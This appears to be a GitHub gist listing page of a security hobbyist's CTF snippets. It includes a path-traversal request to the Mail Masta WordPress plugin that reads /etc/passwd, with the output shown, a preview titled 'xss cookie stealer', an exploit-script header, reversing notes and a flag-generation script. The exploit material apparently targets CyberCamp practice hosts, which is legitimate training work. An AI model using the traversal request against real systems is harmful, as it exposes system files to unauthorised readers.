Skip to content

Instantly share code, notes, and snippets.

View tunelko's full-sized avatar

tunelko tunelko

View GitHub Profile
#!/usr/bin/env python
import requests
import urllib
import base64
import string
import sys
url='https://webvulnerable07.cybercamp.es:8507/index.php'
alpha=string.uppercase+string.lowercase
digits=string.digits
https://webvulnerable05.cybercamp.es:8505/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
<?php
/**
* @package EasySocial
* @copyright Copyright (C) 2010 - 2014 Stack Ideas Sdn Bhd. All rights reserved.
* @license GNU/GPL, see LICENSE.php
* EasySocial is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.

Keybase proof

I hereby claim:

  • I am tunelko on github.
  • I am tunelko (https://keybase.io/tunelko) on keybase.
  • I have a public key whose fingerprint is A6A5 C4CE AE4F 79A0 0318 6B69 CF4D B1F3 89B4 55C5

To claim this, I am signing this object:

@tunelko
tunelko / mediumRE.py
Last active January 17, 2018 17:08
mediumRE
#!/usr/bin/env python
"""
mediumRE from
compare algorithm
for ( i = 0; strlen(input) > i && i <= 29; ++i )
{
if ( enc[i] == input[i] * fibo[i] + i )
++cnt;
}
@tunelko
tunelko / xx-cookie-stealer.php
Created July 15, 2017 13:06
xss cookie stealer

Guia para git dummies Crear el repositorio. Generar la key ssh:

ssh-keygen -t rsa -C "correo@dominio.com"

Copiar ~/.ssh/id_rsa.pub a la configuración de la cuenta de GitHub. Probar SSH:

ssh -T git@github.com
#!/usr/bin/env python
import argparse
# from skeleton.users import models
# from sqlalchemy.exc import SQLAlchemyError
# from collections import Counter
import json
import sys
import requests
"""
gdb-peda$ b *0x0000000000400824
Breakpoint 1 at 0x400824
gdb-peda$ disassemble main
=> 0x0000000000400824 <+212>: je 0x400855 <main+261>
gdb-peda$ run
RBX: 0x7fffffffe238 ("TH1S 1s s3cr3t!!")
..
..
Breakpoint 1, 0x0000000000400824 in main ()
#!/bin/bash
for flags in {1..45}; do echo "$flags: $(openssl rand -hex 16)" >> passwords && for lines in $(cut -f 2 -d ":" passwords); do echo "flag{$lines}" > /home/reto/flag_$flags.txt; done;done